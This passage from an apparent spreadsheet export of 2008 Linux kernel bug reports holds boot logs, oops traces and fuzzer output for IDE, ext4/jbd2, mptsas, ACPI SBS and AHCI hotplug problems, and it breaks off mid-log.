idebus=xx ALI15X3: IDE controller (0x10b9:0x5229 rev 0xc7) at PCI slot 0000:00:12.0 ACPI: PCI Interrupt 0000:00:12.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 ALI15X3: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xff00-0xff07, BIOS settings: hda:DMA, hdb:DMA ide1: BM-DMA at 0xff08-0xff0f, BIOS settings: hdc:DMA, hdd:DMA Probing IDE interface ide0... hdb: ST340016A, ATA DISK drive hda: HDT722525DLAT80, ATA DISK drive hda: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hda: UDMA/133 mode selected hdb: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hdb: UDMA/100 mode selected ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdd: ASUS DVD-E616A, ATAPI CD/DVD-ROM drive hdc: MATSHITADVD-RAM SW-9576S, ATAPI CD/DVD-ROM drive hdc: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hdc: UDMA/66 mode selected hdd: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hdd: drive side 80-wire cable detection failed, limiting max speed to UDMA33 hdd: UDMA/33 mode selected ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 512KiB hda: 488397168 sectors (250059 MB) w/7674KiB Cache, CHS=30401/255/63 hda: cache flushes supported hda: hda1 hda2 hda3 &lt; hda5 hda6 &gt; hda1: &lt;bsd: hda7 hda8 hda9 hda10 hda11 hda12 &gt; hdb: max request size: 128KiB hdb: 78165360 sectors (40020 MB) w/2048KiB Cache, CHS=65535/16/63 hdb: cache flushes not supported hdb: hdb1 hdc: ATAPI 40X DVD-ROM DVD-R-RAM CD-R/RW drive, 2048kB Cache Uniform CD-ROM driver Revision: 3.20 hdd: ATAPI 48X DVD-ROM drive, 2048kB Cache Driver 'sd' needs updating - please use bus_type methods Driver 'sr' needs updating - please use bus_type methods ACPI: PCI Interrupt 0000:00:13.3[D] -&gt; GSI 23 (level, low) -&gt; IRQ 23 ehci_hcd 0000:00:13.3: EHCI Host Controller ehci_hcd 0000:00:13.3: new USB bus registered, assigned bus number 1 ehci_hcd 0000:00:13.3: debug port 1 ehci_hcd 0000:00:13.3: irq 23, io mem 0xf4fff800 ehci_hcd 0000:00:13.3: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 8 ports detected ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver ACPI: PCI Interrupt 0000:00:13.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 ohci_hcd 0000:00:13.0: OHCI Host Controller ohci_hcd 0000:00:13.0: new USB bus registered, assigned bus number 2 ohci_hcd 0000:00:13.0: irq 20, io mem 0xf4ffe000 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 3 ports detected ACPI: PCI Interrupt 0000:00:13.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 21 ohci_hcd 0000:00:13.1: OHCI Host Controller ohci_hcd 0000:00:13.1: new USB bus registered, assigned bus number 3 ohci_hcd 0000:00:13.1: irq 21, io mem 0xf4ffd000 usb usb3: configuration #1 chosen from 1 choice hub 3-0:1.0: USB hub found hub 3-0:1.0: 3 ports detected ACPI: PCI Interrupt 0000:00:13.2[C] -&gt; GSI 22 (level, low) -&gt; IRQ 22 ohci_hcd 0000:00:13.2: OHCI Host Controller ohci_hcd 0000:00:13.2: new USB bus registered, assigned bus number 4 ohci_hcd 0000:00:13.2: irq 22, io mem 0xf4ffc000 usb usb4: configuration #1 chosen from 1 choice hub 4-0:1.0: USB hub found hub 4-0:1.0: 3 ports detected usb 1-6: new high speed USB device using ehci_hcd and address 3 usb 1-6: configuration #1 chosen from 1 choice usb 3-1: new full speed USB device using ohci_hcd and address 2 usb 3-1: configuration #1 chosen from 1 choice hub 3-1:1.0: USB hub found hub 3-1:1.0: 4 ports detected usb 4-2: new full speed USB device using ohci_hcd and address 2 usb 4-2: configuration #1 chosen from 1 choice usb 3-1.1: new low speed USB device using ohci_hcd and address 3 usb 3-1.1: configuration #1 chosen from 1 choice usb 3-1.2: new low speed USB device using ohci_hcd and address 4 usb 3-1.2: configuration #1 chosen from 1 choice usbcore: registered new interface driver usblp Initializing USB Mass Storage driver... scsi0 : SCSI emulation for USB Mass Storage devices usb-storage: device found at 3 usb-storage: waiting for device to settle before scanning usbcore: registered new interface driver usb-storage USB Mass Storage support registered. PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice input: AT Translated Set 2 keyboard as /class/input/input2 input: PC Speaker as /class/input/input3 input: ImPS/2 Logitech Wheel Mouse as /class/input/input4 rtc_cmos 00:02: rtc core: registered rtc_cmos as rtc0 rtc0: alarms up to one month i2c /dev entries driver ali1563_smbus 0000:00:07.0: Found ALi1563 SMBus at 0x0400 w83627ehf: Found W83627EHG chip at 0x290 device-mapper: ioctl: 4.12.0-ioctl (2007-10-02) initialised: dm-devel@redhat.com cpuidle: using governor ladder cpuidle: using governor menu input: Logitech Logitech MOMO Racing as /class/input/input5 Force feedback for Logitech force feedback devices by Johann Deneux &lt;johann.deneux@it.uu.se&gt; input: USB HID v1.00 Joystick [Logitech Logitech MOMO Racing ] on usb-0000:00:13.1-1.1 input: Logitech Logitech Force 3D Pro as /class/input/input6 Force feedback for Logitech force feedback devices by Johann Deneux &lt;johann.deneux@it.uu.se&gt; input: USB HID v1.10 Joystick [Logitech Logitech Force 3D Pro] on usb-0000:00:13.1-1.2 usbcore: registered new interface driver usbhid drivers/hid/usbhid/hid-core.c: v2.6:USB HID core driver Advanced Linux Sound Architecture Driver Version 1.0.15 (Tue Nov 20 19:16:42 2007 UTC). usbcore: registered new interface driver snd-usb-audio ALSA device list: #0: PnP Audio Device at usb-0000:00:13.2-2, full speed TCP cubic registered NET: Registered protocol family 1 NET: Registered protocol family 10 IPv6 over IPv4 tunneling driver NET: Registered protocol family 17 RPC: Registered udp transport module. RPC: Registered tcp transport module. powernow-k8: Found 1 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ processors (2 cpu cores) (version 2.20.00) powernow-k8: 0 : fid 0xe (2200 MHz), vid 0x8 powernow-k8: 1 : fid 0xc (2000 MHz), vid 0xa powernow-k8: 2 : fid 0xa (1800 MHz), vid 0xc powernow-k8: 3 : fid 0x2 (1000 MHz), vid 0x12 rtc_cmos 00:02: setting system clock to 2008-02-06 18:43:02 UTC (1202323382) kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 268k freed udev: renamed network interface eth1 to eth0 udev: renamed network interface eth0_rename to eth1 EXT3 FS on hda5, internal journal scsi 0:0:0:0: Direct-Access Generic USB CF Reader 0.00 PQ: 0 ANSI: 2 sd 0:0:0:0: [sda] Attached SCSI removable disk sd 0:0:0:0: Attached scsi generic sg0 type 0 scsi 0:0:0:1: Direct-Access Generic USB SD Reader 0.00 PQ: 0 ANSI: 2 sd 0:0:0:1: [sdb] Attached SCSI removable disk sd 0:0:0:1: Attached scsi generic sg1 type 0 scsi 0:0:0:2: Direct-Access Generic USB MS Reader 0.00 PQ: 0 ANSI: 2 sd 0:0:0:2: [sdc] Attached SCSI removable disk sd 0:0:0:2: Attached scsi generic sg2 type 0 scsi 0:0:0:3: Direct-Access Generic USB SM Reader 0.00 PQ: 0 ANSI: 2 sd 0:0:0:3: [sdd] Attached SCSI removable disk sd 0:0:0:3: Attached scsi generic sg3 type 0 usb-storage: device scan complete # lspci 00:00.0 Host bridge: ALi Corporation M1695 K8 Northbridge [PCI Express and HyperTransport] 00:01.0 PCI bridge: ALi Corporation PCI Express Root Port 00:02.0 PCI bridge: ALi Corporation PCI Express Root Port 00:04.0 Host bridge: ALi Corporation M1689 K8 Northbridge [Super K8 Single Chip] 00:05.0 PCI bridge: ALi Corporation AGP8X Controller 00:06.0 PCI bridge: ALi Corporation M5249 HTT to PCI Bridge 00:07.0 ISA bridge: ALi Corporation M1563 HyperTransport South Bridge (rev 70) 00:07.1 Bridge: ALi Corporation M7101 Power Management Controller [PMU] 00:11.0 Ethernet controller: ALi Corporation ULi 1689,1573 integrated ethernet. (rev 40) 00:12.0 IDE interface: ALi Corporation M5229 IDE (rev c7) 00:13.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:13.1 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:13.2 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:13.3 USB Controller: ALi Corporation USB 2.0 Controller (rev 01) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 03:00.0 VGA compatible controller: nVidia Corporation NV40 [GeForce 6800] (rev a1) 04:06.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) Software Environment: Vanilla kernel 2.6.24 Problem Description: The ASUS DVD-E616A DVD-ROM drive is capable of doing UDMA100. In the configuration above it is configured for cable-select and connected to the mainboard PATA controller via an 80-wire cable together with a Panasonic SW-9576. This configuration works fine on other operating systems, e. g. BSD. The 80-wire detection for this drive fails on Linux with this message: hdd: ASUS DVD-E616A, ATAPI CD/DVD-ROM drive hdd: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hdd: drive side 80-wire cable detection failed, limiting max speed to UDMA33 hdd: UDMA/33 mode selected This happens regardless wether it is connected at the end of the cable, in the middle, configured as master/slave etc., while the 80-wire detection for the other DVD drive (Panasonic SW-9576) on the same cable succeeds. Even if the DVD-E616A is connected alone as single drive, the detection fails.</t>
  </si>
  <si>
    <t>Weird hang with NPTL and SIGPROF.</t>
  </si>
  <si>
    <t>2008-02-06 16:33 UTC</t>
  </si>
  <si>
    <t>Frank Mayhar</t>
  </si>
  <si>
    <t>2009-03-23 10:07 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None Earliest failing kernel version: 2.6.18 Distribution: Ubuntu Hardware Environment: Any Problem Description: I have a testcase that demonstrates a strange hang of the latest kernel (as well as previous ones). In the process of investigating the NPTL, we wrote a test that just creates a bunch of threads, then does a barrier wait to synchronize them all, after which everybody exits. That's all it does. This works fine under most circumstances. Unfortunately, we also want to do profiling, so we catch SIGPROF and turn on ITIMER_PROF. In this case, at somewhere between 4000 and 4500 threads, and using the NPTL, the system hangs. It's not a hard hang, interrupts are still working and clocks are ticking, but nothing is making progress. It becomes noticeable when the softlockup_tick() warning goes off after the watchdog has been starved long enough. Sometimes the system recovers and gets going again. Other times it doesn't. I've examined the state of things several times with kdb and there's certainly nothing obvious going on. Something, perhaps having to do with the scheduler, is certainly getting into a bad state, but I haven't yet been able to figure out what that is. I've even run it with KFT and have seen nothing obvious there, either, except for the fact that when it hangs it becomes obvious that it stops making progress and it begins to fill up with smp_apic_timer_interrupt() and do_softirq() entries. I've also seen smp_apic_timer_interrupt() appear twice or more on the stack, as if the previous run(s) didn't finish before the next tick happened. Steps to reproduce: I'll attach a testcase shortly.</t>
  </si>
  <si>
    <t>Bug in jbd2_journal_commit_transaction with corrupted filesystem</t>
  </si>
  <si>
    <t>2.6.24-08039-g488b5ec</t>
  </si>
  <si>
    <t>2008-02-07 03:46 UTC</t>
  </si>
  <si>
    <t>2008-05-21 01:22 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-08039-g488b5ec Earliest failing kernel version: - Distribution: Ubuntu Problem Description: [ 272.430721] Aborting journal on device loop0. [ 272.430994] journal commit I/O error [ 272.435911] ext4_abort called. [ 272.435954] EXT4-fs error (device loop0): ext4_journal_start_sb: Detected aborted journal [ 272.436102] Remounting filesystem read-only [ 284.647728] Buffer I/O error on device loop0, logical block 6161 [ 284.647849] Buffer I/O error on device loop0, logical block 6162 [ 284.647931] Buffer I/O error on device loop0, logical block 6163 [ 284.648012] Buffer I/O error on device loop0, logical block 6164 [ 284.650570] Buffer I/O error on device loop0, logical block 15825 [ 284.650678] Buffer I/O error on device loop0, logical block 15826 [ 284.650759] Buffer I/O error on device loop0, logical block 15827 [ 284.650840] Buffer I/O error on device loop0, logical block 15828 [ 285.094478] Buffer I/O error on device loop0, logical block 16204 [ 285.351662] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 6161, count = 4 [ 285.484256] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 2174, count = 1 [ 285.488459] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 2168, count = 1 [ 285.592353] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 3257, count = 1 [ 285.634997] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 12922, count = 4 [ 285.697199] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 9504, count = 3 [ 285.698624] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 6354, count = 4 [ 285.760072] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 16204, count = 3 [ 285.762979] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 3487, count = 1 [ 285.829598] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 12728, count = 2 [ 285.847498] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 12026, count = 2 [ 285.848406] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 3484, count = 1 [ 285.849145] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 11614, count = 1 [ 285.850347] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 11256, count = 2 [ 285.851063] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 10609, count = 2 [ 285.851701] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 10054, count = 2 [ 285.852435] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 9509, count = 2 [ 285.853119] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 6994, count = 1 [ 285.854051] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 10050, count = 2 [ 285.855156] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 3480, count = 1 [ 285.887559] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 8440, count = 1 [ 285.896926] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 7486, count = 1 [ 285.897797] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 7484, count = 1 [ 285.899190] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 7293, count = 1 [ 285.900318] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 6475, count = 1 [ 285.901080] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 6472, count = 1 [ 285.902151] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 6069, count = 1 [ 285.903027] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 5947, count = 1 [ 285.903743] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 6359, count = 1 [ 285.974753] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 5863, count = 1 [ 285.983466] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 8443, count = 1 [ 285.990169] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 5861, count = 1 [ 286.026448] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 5240, count = 1 [ 286.042103] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 4548, count = 1 [ 286.043137] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 4545, count = 1 [ 286.044444] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 16227, count = 2 [ 286.045470] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 16200, count = 2 [ 286.048432] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 15881, count = 2 [ 286.049241] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 14890, count = 2 [ 286.050128] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 14403, count = 2 [ 286.050945] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 13350, count = 2 [ 286.051611] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 11615, count = 1 [ 286.062466] EXT4-fs error (device loop0): ext4_mb_free_blocks: Freeing blocks not in datazone - block = 9208, count = 1 [ 286.064546] Aborting journal on device loop0. [ 286.076979] journal commit I/O error [ 286.077024] ext4_abort called. [ 286.077071] EXT4-fs error (device loop0): ext4_journal_start_sb: Detected aborted journal [ 286.077154] Remounting filesystem read-only [ 286.080941] journal commit I/O error [ 286.090384] EXT4-fs error (device loop0) in ext4_ext_remove_space: Journal has aborted [ 286.090462] EXT4-fs error (device loop0) in ext4_reserve_inode_write: Journal has aborted [ 286.090490] EXT4-fs error (device loop0) in ext4_orphan_del: Journal has aborted [ 286.093003] BUG: unable to handle kernel NULL pointer dereference at 00000000 [ 286.093121] IP: [&lt;c0236892&gt;] jbd2_journal_commit_transaction+0x7d2/0x1710 [ 286.093393] Oops: 0002 [#1] PREEMPT DEBUG_PAGEALLOC [ 286.093538] Modules linked in: [ 286.093577] [ 286.093601] Pid: 3931, comm: kjournald2 Not tainted (2.6.24-08039-g488b5ec #24) [ 286.093684] EIP: 0060:[&lt;c0236892&gt;] EFLAGS: 00010246 CPU: 0 [ 286.093711] EIP is at jbd2_journal_commit_transaction+0x7d2/0x1710 [ 286.093736] EAX: 00000000 EBX: 00000000 ECX: cba5bf74 EDX: 00000000 [ 286.093760] ESI: ffffffff EDI: 00000000 EBP: cba5bf88 ESP: cba5bee0 [ 286.093842] DS: 007b ES: 007b FS: 0000 GS: 0000 SS: 0068 [ 286.093867] Process kjournald2 (pid: 3931, ti=cba5b000 task=cba72000 task.ti=cba5b000) [ 286.093891] Stack: ffffffff 00000000 c0142804 c083b8e0 cf08f6e0 cf08f504 cf08f4f0 cbae25a0 [ 286.094197] 00000000 ccbaac90 00000000 00000000 c014030d 00000000 00000000 0000046f [ 286.094197] 00000008 ffffffff ccbaac90 00000017 00000000 00000000 00000007 0000000a [ 286.094197] Call Trace: [ 286.094197] [&lt;c0142804&gt;] ? trace_hardirqs_on+0xc4/0x150 [ 286.094197] [&lt;c0135422&gt;] ? kthread+0x42/0x70 [ 286.094197] [&lt;c01353e0&gt;] ? kthread+0x0/0x70 [ 286.094197] [&lt;c01052bf&gt;] ? kernel_thread_helper+0x7/0x18 [ 286.094197] ======================= [ 286.094197] Code: f6 40 2b 04 75 22 8b 75 9c 8d 4d ec 8b 95 74 ff ff ff 8b 85 70 ff ff ff 89 34 24 e8 c9 f6 ff ff 85 c0 0f 85 b4 0e 00 e8 2b 66 ee ff 8b 03 [ 286.094197] EIP: [&lt;c0236892&gt;] jbd2_journal_commit_transaction+0x7d2/0x1710 SS:ESP 0068:cba5bee0 [ 286.094236] ---[ end trace cede036776231e5f ]--- Steps to reproduce: I am currently using this modified version of fsfuzzer http://www.cccmz.de/~snakebyte/fsfuzzer-0.6-lmh-eric.tar.bz2 http://www.cccmz.de/~snakebyte/fsfuzz.diff I'll attach the corrupted image, using run_test usually triggers this 50% of the time. If i used gdb correctly, the problem is inside the inlined clear_bit() Fuzzer output is the following root@snakebyte-desktop:~/testing/fsfuzzer-0.6-lmh# ./run_last ++ Testing /root/testing/fsfuzzer-0.6-lmh/fs/ext4.10.img... +++ Checking dir... +++ Making files... +++ Checking stat... +++ Writing to files... +++ Reading from files... +++ device files... +++ Writing to dirs... ./run_test: line 70: /media/test/dir1: Is a directory +++ Checking unlink... +++ fsstress... seed = 1202325243 +++ fsx... Seed set to 3779 truncating to largest ever: 0x35462 truncating to largest ever: 0x3b137 All operations completed A-OK! +++ fstest... Rounded file size to 40960 num_children=10 file_size=40960 num_files=5 loop_count=10 block_size=1024 mmap=0 sync=0 Total data size 2.0 Mbyte Child 0 loop 0 Child 0 loop 1 Child 0 loop 2 Child 0 loop 3 Child 0 loop 4 Child 0 loop 5 Child 1 loop 0 Child 0 loop 6 Child 2 loop 0 Child 3 loop 0 Child 4 loop 0 Child 5 loop 0 Child 1 loop 1 Child 6 loop 0 Child 0 loop 7 Child 2 loop 1 Child 3 loop 1 Child 7 loop 0 Child 8 loop 0 Child 4 loop 1 Child 9 loop 0 Child 5 loop 1 Child 1 loop 2 Child 6 loop 1 Write failed at offset 37888 Child exited with status 1 Child 2 loop 2 Write failed at offset 1024 Child exited with status 1 Child 0 loop 8 Write failed at offset 29696 Child exited with status 1 Child 7 loop 1 Child 3 loop 2 Child 4 loop 2 Child 2 loop 3 Child 5 loop 2 Child 6 loop 2 Child 0 loop 9 Child 3 loop 3 Write failed at offset 38912 Child exited with status 1 Write failed at offset 22528 Child exited with status 1 Write failed at offset 0 Child exited with status 1 Write failed at offset 0 Child exited with status 1 Write failed at offset 0 Child exited with status 1 Write failed at offset 0 Child exited with status 1 after this, the box is unable to reboot</t>
  </si>
  <si>
    <t>Unable to handle kernel NULL pointer dereference at 0000000000000010 (mptsas_probe_expander_phys+0x62/0x427)</t>
  </si>
  <si>
    <t>2.6.23, 2.6.23.14, 2.6.24</t>
  </si>
  <si>
    <t>2008-02-07 05:52 UTC</t>
  </si>
  <si>
    <t>2008-03-10 00:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22-2.6.22.17 Distribution: Gentoo Hardware Environment: 00:00.0 Host bridge [0600]: Intel Corporation 5000X Chipset Memory Controller Hub [8086:25c0] (rev 12) 00:02.0 PCI bridge [0604]: Intel Corporation 5000 Series Chipset PCI Express x4 Port 2 [8086:25e2] (rev 12) 00:03.0 PCI bridge [0604]: Intel Corporation 5000 Series Chipset PCI Express x4 Port 3 [8086:25e3] (rev 12) 00:04.0 PCI bridge [0604]: Intel Corporation 5000 Series Chipset PCI Express x8 Port 4-5 [8086:25f8] (rev 12) 00:05.0 PCI bridge [0604]: Intel Corporation 5000 Series Chipset PCI Express x4 Port 5 [8086:25e5] (rev 12) 00:06.0 PCI bridge [0604]: Intel Corporation 5000 Series Chipset PCI Express x8 Port 6-7 [8086:25f9] (rev 12) 00:07.0 PCI bridge [0604]: Intel Corporation 5000 Series Chipset PCI Express x4 Port 7 [8086:25e7] (rev 12) 00:08.0 System peripheral [0880]: Intel Corporation 5000 Series Chipset DMA Engine [8086:1a38] (rev 12) 00:10.0 Host bridge [0600]: Intel Corporation 5000 Series Chipset FSB Registers [8086:25f0] (rev 12) 00:10.1 Host bridge [0600]: Intel Corporation 5000 Series Chipset FSB Registers [8086:25f0] (rev 12) 00:10.2 Host bridge [0600]: Intel Corporation 5000 Series Chipset FSB Registers [8086:25f0] (rev 12) 00:11.0 Host bridge [0600]: Intel Corporation 5000 Series Chipset Reserved Registers [8086:25f1] (rev 12) 00:13.0 Host bridge [0600]: Intel Corporation 5000 Series Chipset Reserved Registers [8086:25f3] (rev 12) 00:15.0 Host bridge [0600]: Intel Corporation 5000 Series Chipset FBD Registers [8086:25f5] (rev 12) 00:16.0 Host bridge [0600]: Intel Corporation 5000 Series Chipset FBD Registers [8086:25f6] (rev 12) 00:1c.0 PCI bridge [0604]: Intel Corporation 631xESB/632xESB/3100 Chipset PCI Express Root Port 1 [8086:2690] (rev 09) 00:1d.0 USB Controller [0c03]: Intel Corporation 631xESB/632xESB/3100 Chipset UHCI USB Controller #1 [8086:2688] (rev 09) 00:1d.1 USB Controller [0c03]: Intel Corporation 631xESB/632xESB/3100 Chipset UHCI USB Controller #2 [8086:2689] (rev 09) 00:1d.7 USB Controller [0c03]: Intel Corporation 631xESB/632xESB/3100 Chipset EHCI USB2 Controller [8086:268c] (rev 09) 00:1e.0 PCI bridge [0604]: Intel Corporation 82801 PCI Bridge [8086:244e] (rev d9) 00:1f.0 ISA bridge [0601]: Intel Corporation 631xESB/632xESB/3100 Chipset LPC Interface Controller [8086:2670] (rev 09) 00:1f.1 IDE interface [0101]: Intel Corporation 631xESB/632xESB IDE Controller [8086:269e] (rev 09) 00:1f.2 IDE interface [0101]: Intel Corporation 631xESB/632xESB/3100 Chipset SATA IDE Controller [8086:2680] (rev 09) 01:00.0 SCSI storage controller [0100]: LSI Logic / Symbios Logic SAS1068E PCI-Express Fusion-MPT SAS [1000:0058] (rev 08) 02:00.0 PCI bridge [0604]: Broadcom EPB PCI-Express to PCI-X Bridge [1166:0103] (rev c3) 03:00.0 Ethernet controller [0200]: Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet [14e4:164c] (rev 12) 04:00.0 PCI bridge [0604]: Intel Corporation 6311ESB/6321ESB PCI Express Upstream Port [8086:3500] (rev 01) 04:00.3 PCI bridge [0604]: Intel Corporation 6311ESB/6321ESB PCI Express to PCI-X Bridge [8086:350c] (rev 01) 05:00.0 PCI bridge [0604]: Intel Corporation 6311ESB/6321ESB PCI Express Downstream Port E1 [8086:3510] (rev 01) 05:01.0 PCI bridge [0604]: Intel Corporation 6311ESB/6321ESB PCI Express Downstream Port E2 [8086:3514] (rev 01) 06:00.0 PCI bridge [0604]: Broadcom EPB PCI-Express to PCI-X Bridge [1166:0103] (rev c3) 07:00.0 Ethernet controller [0200]: Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet [14e4:164c] (rev 12) 0e:0d.0 VGA compatible controller [0300]: ATI Technologies Inc ES1000 [1002:515e] (rev 02) Software Environment: Gnu C 4.1.2 Gnu make 3.81 binutils Binutils util-linux 2.12r mount 2.12r module-init-tools 3.4 e2fsprogs 1.40.5 Linux C Library 2.7 Dynamic linker (ldd) 2.7 Procps 3.2.7 Net-tools 1.60 Kbd 1.13 Sh-utils 6.9 Attaching dmesg with oopses (2.6.23 and 2.6.23.14) and dmesg from 2.6.14.17 (working kernel). Please also note that 2.6.23.14 is not able to dump a full Oops msg!</t>
  </si>
  <si>
    <t>OOPS early during boot on mutex_lock in acpi_smbus_transaction (NULL "hc" pointer?) - Acer TravelMate 4501WLMi</t>
  </si>
  <si>
    <t>2008-02-07 12:40 UTC</t>
  </si>
  <si>
    <t>Oldřich Jedlička</t>
  </si>
  <si>
    <t>2008-02-10 16:47 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23 Earliest failing kernel version: 2.6.24 Distribution: Gentoo, vanilla-sources Hardware Environment: notebook Acer TravelMate 4501WLMi, Pentium M 1.6GHz, ATI Mobility Radeon 9700, two monitors (panel+LCD) Software Environment: N/A Problem Description: Kernel ends-up with OOPS during boot - very early after the video is switched to graphics mode with Tux logo. It looks like there is something wrong in initialization of ACPI SBS. I tried to investigate and it seems that the NULL parameter was passed as a parameter "hc" to acpi_smbus_transaction. I will attach text of OOPS (written down from camera-taken snapshot), my .config, `lspci -v`, /proc/cpuinfo. What else? Steps to reproduce: Always prints OOPS at the same stage of boot (very early after the video mode is switched to graphics), no need to do special steps</t>
  </si>
  <si>
    <t>AHCI (JMICRON) hotplug doesn't work with esata drive</t>
  </si>
  <si>
    <t>2.6.24, 2.6.23.8</t>
  </si>
  <si>
    <t>2008-02-07 20:10 UTC</t>
  </si>
  <si>
    <t>devsk</t>
  </si>
  <si>
    <t>2009-03-24 04:38 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Not known Earliest failing kernel version: 2.6.23.8 Distribution: Gentoo Hardware Environment: JMicron AHCI controller in PCIE, Nvidia Nforce4, Software Environment: gcc 4.2.2, binutils 2.18, glibc 2.7 Problem Description: I have AHCI in kernel: If I have the drive on during boot, the drive is detected, /dev/sdi is created and works fine. If I turn the drive on after boot, the drive throws errors and no /dev/sdi is created (referred as "errors"). Turning the drive off and on again, doesn't help. I have AHCI built as module: If the drive is on and hasn't seen errors earlier, when I modprobe ahci, the drive is detected fine, /dev/sdi is created and works. If the drive is off and I modprobe ahci, errors. A rmmod and modprobe doesn't help. If I modprobe ahci and then turn on the drive, errors. Steps to reproduce: Turn the device on after the AHCI has loaded and errors. The errors seen are: ###################### drive is turned on and modprobe ahci is done ######################### Feb 7 19:13:03 localhost [ 361.513897] ahci 0000:04:00.0: version 3.0 Feb 7 19:13:03 localhost [ 361.514148] ACPI: PCI Interrupt Link [APC2] enabled at IRQ 17 Feb 7 19:13:03 localhost [ 361.514155] ACPI: PCI Interrupt 0000:04:00.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 22 Feb 7 19:13:04 localhost [ 362.513197] 